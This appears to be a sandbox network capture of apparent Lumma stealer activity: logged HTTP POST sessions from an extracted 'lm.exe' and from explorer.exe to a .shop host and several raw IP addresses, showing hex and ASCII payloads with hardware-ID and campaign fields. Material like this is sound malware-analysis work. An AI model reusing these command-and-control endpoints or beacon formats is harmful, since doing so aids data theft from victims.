2024-07-27 06:54:49 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8779 Host: liernessfornicsa.shop
2024-07-27 06:54:49 UTC	8779	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 35 43 41 30 30 39 41 46 44 46 43 31 33 39 41 45 38 30 33 33 32 43 30 39 34 39 36 38 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 54 6f 59 72 4a 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8DA5CA009AFDFC139AE80332C094968D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"qToYrJ----b
2024-07-27 06:54:49 UTC	808	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 06:54:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n8gi9r4v2kknnmh528k0dlsg9k; expires=Wed, 20-Nov-2024 00:41:28 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=shNHX2Bl7IwausfJPe%2Byu37h7a2SY6ESuXhc6b0B3HhiM%2FVcz48In7l7Em89ojR494fUUb2qyCYvgCRSif8S5lYjmLxReg12niEnht%2BfZLQnHlAaWvfkqZ9W4W6c9%2FKkBjSmYZ5PIdg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ab8676eed43ad-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 06:54:49 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-27 06:54:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50745	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:50 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 06:54:50 UTC	1267	OUT	Data Raw: 4f 59 36 75 39 7a 73 5a 4f 69 4d 45 77 69 4b 6c 5a 4a 35 34 36 49 54 4f 69 58 33 69 4c 51 6b 6a 42 63 66 55 50 77 30 4d 47 2f 68 64 6b 51 69 6a 79 57 4a 4c 70 6f 6b 69 38 77 65 4b 57 50 6f 52 4d 47 4f 59 50 5a 62 6e 76 50 62 69 78 57 77 59 67 66 31 2f 79 71 54 7a 49 41 4f 77 34 38 6e 41 37 62 41 50 56 7a 52 7a 36 4c 61 75 38 41 74 76 62 66 4e 74 39 34 4d 73 59 54 69 2b 61 55 77 56 64 2b 36 78 56 49 73 32 62 4c 73 65 70 2f 46 37 52 2f 42 45 6d 62 4a 68 33 45 6f 59 6d 54 77 4e 50 55 51 79 66 76 4e 58 33 35 6b 55 32 4a 35 71 52 68 36 59 46 4d 66 64 49 36 65 64 5a 70 6c 72 31 75 55 41 57 73 67 72 53 48 71 54 76 33 42 36 6c 68 4e 32 70 51 52 55 73 36 49 5a 58 56 4d 71 34 32 6b 67 4c 2b 2b 5a 66 2f 63 62 4b 31 75 72 59 33 59 7a 51 67 5a 56 78 65 71 66 55 71 61 Data Ascii: OY6u9zsZOiMEwiKlZJ546ITOiX3iLQkjBcfUPw0MG/hdkQijyWJLpoki8weKWPoRMGOYPZbnvPbixWwYgf1/yqTzIAOw48nA7bAPVzRz6Lau8AtvbfNt94MsYTi+aUwVd+6xVIs2bLsep/F7R/BEmbJh3EoYmTwNPUQyfvNX35kU2J5qRh6YFMfdI6edZplr1uUAWsgrSHqTv3B6lhN2pQRUs6IZXVMq42kgL++Zf/cbK1urY3YzQgZVxeqfUqa
2024-07-27 06:54:51 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:51 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:51 UTC	685	IN	Data Raw: 43 66 34 66 42 59 57 39 55 57 75 61 66 48 57 75 56 45 6e 73 68 52 6f 4c 57 44 6e 78 61 65 63 6a 67 79 44 61 50 73 66 39 53 36 67 44 73 64 4a 55 50 63 51 79 55 6b 67 48 4c 53 38 71 35 33 42 4d 38 35 38 41 62 6f 34 59 45 46 33 35 54 6b 4d 64 52 30 32 79 71 5a 43 4f 5a 61 66 51 69 69 53 33 7a 6a 6c 63 72 38 75 61 39 44 2f 72 71 4b 59 32 39 76 53 50 75 2f 4e 6d 33 63 4b 77 78 45 6d 58 4f 56 77 6f 34 4f 46 47 31 73 72 32 67 73 52 57 41 75 78 47 7a 63 47 49 53 70 39 70 6a 74 75 7a 48 4a 41 68 6a 71 45 43 61 56 46 53 50 45 69 50 65 57 63 71 58 74 6a 35 67 74 75 59 33 58 50 66 4d 73 56 53 72 6b 30 37 4d 42 4a 70 6e 45 43 51 74 4e 56 4f 51 2b 64 42 33 37 44 6a 74 79 4e 52 76 5a 45 58 4b 48 30 33 39 58 42 44 48 53 52 4d 57 5a 30 67 6b 77 62 7a 6c 76 76 49 78 74 44 Data Ascii: Cf4fBYW9UWuafHWuVEnshRoLWDnxaecjgyDaPsf9S6gDsdJUPcQyUkgHLS8q53BM858Abo4YEF35TkMdR02yqZCOZafQiiS3zjlcr8ua9D/rqKY29vSPu/Nm3cKwxEmXOVwo4OFG1sr2gsRWAuxGzcGISp9pjtuzHJAhjqECaVFSPEiPeWcqXtj5gtuY3XPfMsVSrk07MBJpnECQtNVOQ+dB37DjtyNRvZEXKH039XBDHSRMWZ0gkwbzlvvIxtD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50746	172.67.213.85	443	4936	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:50 UTC	287	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20432 Host: liernessfornicsa.shop
2024-07-27 06:54:50 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 35 43 41 30 30 39 41 46 44 46 43 31 33 39 41 45 38 30 33 33 32 43 30 39 34 39 36 38 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 54 6f 59 72 4a 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8DA5CA009AFDFC139AE80332C094968D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"qToYrJ----b
2024-07-27 06:54:50 UTC	5101	OUT	Data Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-07-27 06:54:51 UTC	808	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 06:54:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m7p8utapudrqgvsfjqgeuu1e4v; expires=Wed, 20-Nov-2024 00:41:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CuZo775el%2BqznhsBMOuB%2F92LLM1cUwWJ6UqyQMaixOLe4uk6vcoN7ojdq1kVsEEn6u7CFxtTHZ%2BvreZqAsF3GQmWeNDNQiIWpnCi7%2FRNcv19TdYfZ0oH5qPYom9iNMP84fAPDKgGltg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ab86fea3c0f97-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 06:54:51 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-27 06:54:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50747	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:52 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:54:52 UTC	1122	OUT	Data Raw: 66 37 58 39 64 66 6c 49 41 57 47 74 34 44 41 4a 67 34 71 55 6b 51 54 71 55 6b 78 34 2f 31 77 35 75 30 45 77 53 6d 51 67 79 41 6b 77 6c 30 39 38 64 47 2f 62 4e 4d 58 76 52 33 72 79 77 35 6b 45 59 57 38 4e 35 4b 76 4f 69 67 41 65 55 43 5a 36 5a 69 53 2b 2b 35 61 69 6f 78 76 78 51 38 49 7a 4d 4b 73 48 67 4f 41 58 70 63 46 47 73 4b 7a 64 30 46 31 48 6a 34 6d 6c 64 74 36 42 50 4c 4a 69 70 56 57 51 6b 70 6c 4c 49 39 2f 47 78 65 76 46 75 66 6f 57 30 61 51 48 59 72 4f 72 33 4d 6c 52 78 7a 75 43 75 4b 36 2b 41 30 4b 45 37 58 6f 69 67 63 68 67 72 4f 73 6b 77 6f 33 79 38 64 47 66 38 56 32 4a 72 32 69 71 4f 72 6b 46 61 31 79 63 79 48 70 37 69 73 56 75 36 4b 31 66 62 74 6b 63 6e 35 50 5a 6a 53 67 55 47 66 66 72 34 66 43 68 51 44 68 43 31 45 37 4d 33 54 39 44 32 48 54 Data Ascii: f7X9dflIAWGt4DAJg4qUkQTqUkx4/1w5u0EwSmQgyAkwl098dG/bNMXvR3ryw5kEYW8N5KvOigAeUCZ6ZiS++5aioxvxQ8IzMKsHgOAXpcFGsKzd0F1Hj4mldt6BPLJipVWQkplLI9/GxevFufoW0aQHYrOr3MlRxzuCuK6+A0KE7XoigchgrOskwo3y8dGf8V2Jr2iqOrkFa1ycyHp7isVu6K1fbtkcn5PZjSgUGffr4fChQDhC1E7M3T9D2HT
2024-07-27 06:54:53 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:53 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:53 UTC	685	IN	Data Raw: 4a 38 34 6f 5a 51 51 78 57 53 63 38 63 38 4f 6f 54 74 48 79 7a 38 50 6f 33 6e 45 52 4d 52 4c 4f 4b 58 78 58 53 42 77 45 7a 45 36 6e 67 54 62 64 4b 45 63 65 38 6c 39 30 69 65 39 42 75 6d 4c 66 64 4c 57 76 43 37 45 74 71 74 30 36 2f 6e 48 38 6d 71 35 6a 6b 32 78 44 57 4f 67 69 69 55 6e 75 53 64 65 78 51 6e 67 55 74 52 69 50 33 4c 50 72 35 67 58 38 78 77 4e 70 47 47 2b 59 35 2b 69 42 30 43 4f 69 6b 2b 65 73 72 6d 66 59 6b 59 42 2f 4e 71 33 55 4a 6b 4d 6a 4e 62 39 4b 6c 63 4b 43 4c 63 6f 33 45 77 30 73 6f 31 4a 54 33 6b 47 74 48 54 7a 48 73 72 4c 49 53 50 41 57 70 64 74 6b 72 2b 6c 64 6e 31 66 54 70 6e 74 49 65 2b 4c 7a 33 54 65 4a 30 4f 6a 76 6e 65 53 61 57 68 75 70 5a 42 68 37 39 6b 66 77 33 71 43 42 58 73 50 4c 7a 6f 4b 4e 57 48 62 47 34 69 70 61 35 47 69 Data Ascii: J84oZQQxWSc8c8OoTtHyz8Po3nERMRLOKXxXSBwEzE6ngTbdKEce8l90ie9BumLfdLWvC7Etqt06/nH8mq5jk2xDWOgiiUnuSdexQngUtRiP3LPr5gX8xwNpGG+Y5+iB0COik+esrmfYkYB/Nq3UJkMjNb9KlcKCLco3Ew0so1JT3kGtHTzHsrLISPAWpdtkr+ldn1fTpntIe+Lz3TeJ0OjvneSaWhupZBh79kfw3qCBXsPLzoKNWHbG4ipa5Gi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	50748	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:54 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:54:54 UTC	1122	OUT	Data Raw: 51 6c 32 58 67 70 30 37 56 41 51 47 72 71 53 33 72 51 37 59 56 2b 7a 62 71 68 74 31 4b 66 39 32 6e 4e 53 32 49 6b 62 74 63 6f 53 35 50 6c 50 63 75 6d 32 33 65 6b 49 62 2b 74 33 58 48 79 4f 30 63 61 59 78 51 47 70 37 71 6e 6b 44 70 50 73 72 76 34 45 65 67 45 6e 53 4e 73 39 6c 31 2f 70 6e 5a 2b 43 78 73 65 38 33 71 58 4d 69 74 4c 6a 6d 6b 45 6a 4e 31 41 37 57 36 59 62 66 62 46 41 58 59 43 52 77 37 37 6f 39 6f 50 2b 74 55 4e 47 61 58 37 57 5a 73 6f 44 6a 44 74 7a 78 33 4a 50 42 6a 51 5a 65 65 54 62 4a 69 6e 77 33 70 6a 77 32 37 59 57 37 64 35 6c 78 38 69 6d 4f 49 30 79 41 77 56 69 5a 79 6d 73 53 58 67 56 65 78 41 59 2f 61 4b 63 4a 62 38 34 4f 5a 30 4e 58 6a 46 67 64 45 51 71 59 77 4f 4d 72 2f 44 66 6c 70 2b 47 6f 69 59 30 63 44 46 62 41 37 54 78 43 72 68 78 Data Ascii: Ql2Xgp07VAQGrqS3rQ7YV+zbqht1Kf92nNS2IkbtcoS5PlPcum23ekIb+t3XHyO0caYxQGp7qnkDpPsrv4EegEnSNs9l1/pnZ+Cxse83qXMitLjmkEjN1A7W6YbfbFAXYCRw77o9oP+tUNGaX7WZsoDjDtzx3JPBjQZeeTbJinw3pjw27YW7d5lx8imOI0yAwViZymsSXgVexAY/aKcJb84OZ0NXjFgdEQqYwOMr/Dflp+GoiY0cDFbA7TxCrhx
2024-07-27 06:54:55 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:55 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:55 UTC	685	IN	Data Raw: 4b 49 36 4d 43 66 31 6d 4e 77 63 4c 64 69 72 37 38 41 64 31 5a 6b 4e 31 6c 6a 5a 4f 55 6b 71 44 67 6f 55 53 49 4f 75 4b 43 35 67 4c 31 4a 41 64 77 37 38 5a 77 70 34 45 46 4a 2b 69 4c 35 59 51 71 67 73 61 30 69 79 31 6e 73 6a 51 4c 6a 38 39 62 7a 61 46 2b 62 52 43 66 6e 70 58 48 4f 2f 76 58 6b 73 61 66 5a 79 48 72 4c 4b 33 51 46 55 72 37 57 6a 30 38 66 69 54 4f 69 39 6b 75 79 6f 33 7a 57 4c 37 5a 49 34 72 32 6f 54 74 64 77 30 51 43 5a 37 67 51 79 36 58 39 72 4e 57 47 50 56 39 74 4c 5a 44 55 47 73 2b 65 33 77 6b 72 42 59 38 37 4a 62 79 43 33 68 62 79 31 39 4a 76 6b 68 74 65 7a 42 31 4f 2f 61 49 59 77 68 6b 41 59 33 4d 5a 49 6b 55 65 75 53 6f 58 35 62 46 7a 79 55 45 32 43 4b 79 54 61 4b 56 55 6c 76 65 6c 41 57 6b 49 50 42 49 5a 6c 47 43 7a 44 77 38 37 6b 4d Data Ascii: KI6MCf1mNwcLdir78Ad1ZkN1ljZOUkqDgoUSIOuKC5gL1JAdw78Zwp4EFJ+iL5YQqgsa0iy1nsjQLj89bzaF+bRCfnpXHO/vXksafZyHrLK3QFUr7Wj08fiTOi9kuyo3zWL7ZI4r2oTtdw0QCZ7gQy6X9rNWGPV9tLZDUGs+e3wkrBY87JbyC3hby19JvkhtezB1O/aIYwhkAY3MZIkUeuSoX5bFzyUE2CKyTaKVUlvelAWkIPBIZlGCzDw87kM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50749	172.67.213.85	443	4936	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:55 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1245 Host: liernessfornicsa.shop
2024-07-27 06:54:55 UTC	1245	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 35 43 41 30 30 39 41 46 44 46 43 31 33 39 41 45 38 30 33 33 32 43 30 39 34 39 36 38 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 71 54 6f 59 72 4a 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8DA5CA009AFDFC139AE80332C094968D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"qToYrJ----b
2024-07-27 06:54:55 UTC	810	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 06:54:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4im2t5qajia1uduuouch28hm3r; expires=Wed, 20-Nov-2024 00:41:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xcZ1egnxZVnoR6zytupDnbjPMPxXXMUMsIeCYYgeOoKGa6LGsNCDjhSyBy2AwTcwjr2tCKAE8qOiNE%2FxQX4qQHOov59GA%2BZ9jkO7gd9e44w%2FFQ1cXUUJSow%2FYPkIJfETY2ol%2B2sAfFI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ab88d8837189d-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 06:54:55 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-27 06:54:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	50750	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:56 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 06:54:56 UTC	1267	OUT	Data Raw: 4f 4a 49 63 77 34 76 33 4d 44 53 38 52 4a 34 70 34 4a 7a 62 34 36 2b 79 34 4f 65 53 35 51 70 53 48 4a 6f 34 68 41 45 77 49 4b 30 74 39 5a 37 4a 68 6b 53 42 5a 71 34 67 53 46 70 52 55 6e 30 72 37 53 73 33 72 6e 67 6e 6a 42 68 62 68 35 72 47 6c 42 62 33 71 53 35 63 55 46 6e 45 6a 66 66 38 39 35 69 41 51 37 63 4c 38 61 4e 5a 79 50 79 4b 52 65 57 6d 62 45 46 50 66 39 30 4b 5a 36 35 73 61 38 44 48 67 30 4f 52 71 46 2b 55 41 49 59 6b 2f 4c 77 46 49 38 39 71 55 71 7a 66 71 2f 71 78 43 56 74 43 6b 78 36 4b 68 51 37 47 5a 70 68 39 34 62 67 51 41 2f 49 2b 75 4e 4d 65 70 66 4e 68 68 36 78 70 41 71 68 46 63 61 79 44 47 62 49 32 34 72 71 53 62 64 31 6f 42 4f 39 6e 66 48 57 50 6d 37 51 45 2f 76 31 6a 37 78 62 69 2b 77 33 32 47 74 6e 30 50 35 7a 58 6a 54 44 61 44 69 4a Data Ascii: OJIcw4v3MDS8RJ4p4Jzb46+y4OeS5QpSHJo4hAEwIK0t9Z7JhkSBZq4gSFpRUn0r7Ss3rngnjBhbh5rGlBb3qS5cUFnEjff895iAQ7cL8aNZyPyKReWmbEFPf90KZ65sa8DHg0ORqF+UAIYk/LwFI89qUqzfq/qxCVtCkx6KhQ7GZph94bgQA/I+uNMepfNhh6xpAqhFcayDGbI24rqSbd1oBO9nfHWPm7QE/v1j7xbi+w32Gtn0P5zXjTDaDiJ
2024-07-27 06:54:57 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:57 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:57 UTC	685	IN	Data Raw: 6d 71 48 41 46 6b 76 2b 42 64 34 6b 4d 70 48 34 4e 6a 70 6c 6e 4e 2f 4d 70 42 2f 73 46 65 61 2b 48 67 45 30 41 54 65 76 6b 5a 69 30 39 56 4d 73 30 41 38 2f 63 32 43 53 50 34 49 72 64 71 4e 61 63 52 6e 76 42 34 47 65 54 51 5a 61 34 48 58 69 32 6a 7a 6a 4a 74 4b 51 42 35 35 6e 6d 4c 47 48 47 70 6c 74 75 66 4e 6a 7a 65 56 52 56 65 6b 48 4f 31 37 32 48 49 44 78 33 64 58 35 4c 63 54 74 4a 38 38 46 35 56 39 4e 68 36 56 4e 74 75 42 58 6a 34 6e 79 6f 41 6a 52 69 42 6b 69 2f 53 6d 62 35 2b 37 74 56 64 47 36 41 50 4b 4d 4a 57 75 65 39 5a 49 55 62 2f 72 35 65 45 32 72 38 34 6a 48 43 53 41 73 56 71 55 6d 75 7a 30 37 69 6f 6a 52 2b 36 45 79 2f 79 4f 36 57 6b 4e 55 2f 38 36 57 72 78 6f 67 7a 65 7a 4b 6d 6b 46 4d 4c 55 69 51 4b 57 32 37 35 36 49 51 67 55 44 54 4d 43 45 Data Ascii: mqHAFkv+Bd4kMpH4NjplnN/MpB/sFea+HgE0ATevkZi09VMs0A8/c2CSP4IrdqNacRnvB4GeTQZa4HXi2jzjJtKQB55nmLGHGpltufNjzeVRVekHO172HIDx3dX5LcTtJ88F5V9Nh6VNtuBXj4nyoAjRiBki/Smb5+7tVdG6APKMJWue9ZIUb/r5eE2r84jHCSAsVqUmuz07iojR+6Ey/yO6WkNU/86WrxogzezKmkFMLUiQKW2756IQgUDTMCE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	50751	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:58 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:54:58 UTC	1122	OUT	Data Raw: 49 44 37 6c 6f 73 32 6b 63 71 4c 68 6c 65 6c 4f 52 41 54 62 6e 2b 71 70 78 30 6f 51 6a 7a 46 76 72 5a 52 39 38 79 6d 35 72 59 59 4c 79 64 6f 36 66 6d 46 53 53 44 75 72 66 72 4b 71 4c 2b 55 49 67 75 78 63 36 57 55 39 79 55 33 4d 56 59 6d 4b 70 39 54 38 6c 66 4c 77 6b 44 57 34 7a 6f 72 45 45 76 4e 30 73 6d 38 6b 42 6b 34 6e 76 75 70 69 77 4d 4f 30 67 62 6d 39 7a 75 51 35 74 65 41 68 33 53 53 6d 58 7a 51 65 4e 51 53 45 53 50 38 55 72 50 76 66 53 6f 59 50 73 46 42 77 65 56 37 4d 50 37 39 6f 65 4d 62 33 75 69 65 52 45 4d 72 65 51 6e 52 37 6d 59 68 62 4f 78 67 35 31 39 43 77 39 4b 54 55 7a 65 4b 74 55 54 30 63 59 67 35 70 48 33 2f 62 47 38 6b 55 58 6c 52 61 6c 2b 55 4b 52 42 39 65 69 4e 62 61 38 73 4d 75 66 74 4e 49 46 59 32 35 6f 75 2b 74 70 42 33 44 50 68 56 Data Ascii: ID7los2kcqLhlelORATbn+qpx0oQjzFvrZR98ym5rYYLydo6fmFSSDurfrKqL+UIguxc6WU9yU3MVYmKp9T8lfLwkDW4zorEEvN0sm8kBk4nvupiwMO0gbm9zuQ5teAh3SSmXzQeNQSESP8UrPvfSoYPsFBweV7MP79oeMb3uieREMreQnR7mYhbOxg519Cw9KTUzeKtUT0cYg5pH3/bG8kUXlRal+UKRB9eiNba8sMuftNIFY25ou+tpB3DPhV
